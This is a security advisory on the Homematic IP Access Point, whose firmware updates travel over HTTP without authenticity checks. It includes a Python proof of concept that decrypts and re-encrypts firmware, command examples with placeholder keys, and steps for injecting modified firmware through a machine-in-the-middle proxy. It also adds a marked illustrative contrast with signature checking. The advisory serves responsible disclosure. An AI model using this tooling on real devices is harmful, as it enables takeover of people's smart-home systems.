Advisory ID:               SYSS-2025-054
Product:                   Homematic IP Access Point (HmIP-HAP)
Manufacturer:              eQ-3
Affected Version(s):       Bootloader: v3.0.8
                           Application v3.0.18
Tested Version(s):         Bootloader: v3.0.8
                           Application v3.0.18
Vulnerability Type:        Download of Code Without Integrity Check (CWE-494)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2025-08-25
Solution Date:             -
Public Disclosure:         2026-02-03
CVE Reference:             Not yet assigned
Author of Advisory:        Jan Wütherich, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Homematic IP Access Point is a core component of the Homematic IP
smart home system. It acts as a bridge between Homematic IP devices and
the Homematic IP cloud.

The manufacturer describes the product as follows (see [1]):

"This is where the heart of your smart home beats: You can conveniently
set up your smart home system via the Homematic IP access point. This
enables you to control it intuitively with the smartphone app. To do
that, just connect the access point via a network cable. And you're
finished!"

Due to missing authenticity checks during the update process, the device
is vulnerable to malicious code injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Homematic IP Access Point checks for firmware updates over HTTP and
downloads the local bootloader, web bootloader, and application updates
over HTTP.

Update files contain several encrypted "chunks" that include records of
firmware data to be written to the internal flash memory. Each chunk is
encrypted using AES-128-CBC and contains a CRC32 checksum at the end.
The local bootloader, web bootloader, and application updates are all
encrypted with separate keys and initialization vectors (IVs), which are
the same for every device model.
After the firmware has been written to the flash memory, it is checked
on every boot using a CRC32 over the flash memory contents.

There is no authenticity verification before writing the files to the
device's internal flash memory. An attacker can encrypt a modified
firmware with malicious contents and intercept the HTTP traffic using a
machine-in-the-middle attack. By providing the malicious file to the
update request, it is then written to the internal flash memory.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

A proof-of-concept software tool was written to decrypt and encrypt the
firmware.

##############################################################################################
import argparse
import struct

import crcmod
from Crypto.Cipher import AES

# CRC-32 with polynomial 0x04C11DB7, no bit reversal, initial value
# 0xFFFFFFFF and no final XOR
crc32_func = crcmod.mkCrcFun(0x104c11db7, rev=False, initCrc=0xFFFFFFFF, xorOut=0)


def process_file(command, input_file, output_file, key_hex, key_iv):
    key = bytearray.fromhex(key_hex)
    iv = bytearray.fromhex(key_iv)
    cipher = AES.new(key, AES.MODE_CBC, iv=iv)

    while True:
        # Each chunk: 2-byte big-endian size, then (size - 4) bytes of
        # data, then a 4-byte big-endian CRC32
        size_data = input_file.read(2)
        if not size_data:
            break  # EOF

        size, = struct.unpack(">H", size_data)
        output_file.write(size_data)

        buffer = input_file.read(size - 4)
        if len(buffer) != size - 4:
            raise Exception("Unexpected EOF")

        if command == "decrypt":
            # The stored CRC covers the encrypted data
            expected_crc, = struct.unpack(">I", input_file.read(4))
            calculated_crc = crc32_func(buffer)
            if calculated_crc != expected_crc:
                raise Exception(f"Invalid CRC ({calculated_crc:08x} vs {expected_crc:08x})")

            decrypted = cipher.decrypt(buffer)
            output_file.write(decrypted)
            output_file.write(struct.pack(">I", crc32_func(decrypted)))
        elif command == "encrypt":
            # CRC is ignored
            _crc, = struct.unpack(">I", input_file.read(4))

            encrypted = cipher.encrypt(buffer)
            output_file.write(encrypted)
            output_file.write(struct.pack(">I", crc32_func(encrypted)))


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('command', choices=['decrypt', 'encrypt'], help='Command to execute')
    parser.add_argument('input_file', type=argparse.FileType('rb'))
    parser.add_argument('output_file', type=argparse.FileType('wb'))
    parser.add_argument('--key', required=True)
    parser.add_argument('--iv', required=True)
    args = parser.parse_args()

    with args.input_file as infile, args.output_file as outfile:
        process_file(args.command, infile, outfile, args.key, args.iv)
##############################################################################################

With this software tool and the correct key and IV, the local bootloader
update file can be successfully decrypted. The key and IV are the same
for every device and have been extracted from a Homematic IP Access
Point. They are replaced with placeholder values for this example:

python cryptfw_clean.py --key 00000000000000000000000000000000 --iv 00000000000000000000000000000000 decrypt HMIP-HAP-local_bootloader_update.bin decrypted.bin

After decryption, additional parsing is required to process the
contained records and frames. After modifying the file, the CRC32 at the
end must be manually adjusted, and then the file can be reencrypted:

python cryptfw_clean.py --key 00000000000000000000000000000000 --iv 00000000000000000000000000000000 encrypt decrypted.bin HMIP-HAP-local_bootloader_update.bin

Using Burp Suite or a different proxy software, the update data response
is intercepted, and the hexadecimal data is replaced with the data from
the reencrypted file. The device now writes the modified update file
into the internal flash memory.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution for the described security issue.
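
The following is an added illustration, not part of the SySS advisory and not the manufacturer's code. It contrasts the unkeyed CRC32 check described under Vulnerability Details with a signature verified against a public key before flashing: the CRC can be recomputed by anyone, the signature cannot. Assumptions: the RSA test key, the sample image and all function names are constructed for this example, and the AES layer is left out because the advisory states that its keys are shared by every device.

```python
import hashlib
import struct

def crc32_mpeg2(data: bytes) -> int:
    """CRC-32 as set up in the PoC: poly 0x04C11DB7, init 0xFFFFFFFF, no reflection, no final XOR."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte << 24
        for _ in range(8):
            crc = ((crc << 1) ^ (0x04C11DB7 if crc & 0x80000000 else 0)) & 0xFFFFFFFF
    return crc

def frame(payload: bytes) -> bytes:
    """Chunk layout used by the PoC: 2-byte big-endian size, payload, 4-byte CRC32."""
    return struct.pack(">H", len(payload) + 4) + payload + struct.pack(">I", crc32_mpeg2(payload))

def crc_ok(chunk: bytes) -> bool:
    """The only check the advisory describes: an unkeyed checksum anyone can recompute."""
    size, = struct.unpack(">H", chunk[:2])
    return len(chunk) == size + 2 and crc32_mpeg2(chunk[2:-4]) == struct.unpack(">I", chunk[-4:])[0]

# Constructed TEST key built from two Mersenne primes; far too weak for real use.
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N = P * Q                                # public modulus, stored on the device with E
D = pow(E, -1, (P - 1) * (Q - 1))        # private exponent, never leaves the vendor
K = (N.bit_length() + 7) // 8            # modulus length in bytes
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def encode(image: bytes) -> int:
    """EMSA-PKCS1-v1_5 encoding of SHA-256(image), as an integer below N."""
    t = SHA256_DIGESTINFO + hashlib.sha256(image).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t, "big")

def sign(image: bytes) -> int:
    """Vendor side: requires the private exponent D."""
    return pow(encode(image), D, N)

def signature_ok(image: bytes, sig: int) -> bool:
    """Device side: rebuild the expected encoding and compare it whole before flashing."""
    return 0 <= sig < N and pow(sig, E, N) == encode(image)

def demo():
    image = b"constructed firmware image"              # constructed sample input
    sig = sign(image)
    tampered = image.replace(b"firmware", b"modified")  # altered in transit, CRC recomputed
    return crc_ok(frame(image)), crc_ok(frame(tampered)), signature_ok(image, sig), signature_ok(tampered, sig)

if __name__ == "__main__":
    print(demo())
```

Because the device would hold only the public values N and E, extracting them from one unit does not allow signing a modified image, unlike the shared AES key and IV.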

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-07-23: Vulnerability discovered
2025-08-25: Vulnerability reported to manufacturer
2025-09-04: Vulnerability reported to manufacturer again
2026-02-03: Public disclosure of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Homematic IP Access Point
    https://homematic-ip.com/en/product/access-point
[2] SySS Security Advisory SYSS-2025-054
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-054.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Jan Wütherich of SySS GmbH.

E-Mail: jan.wuetherich@syss.de

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en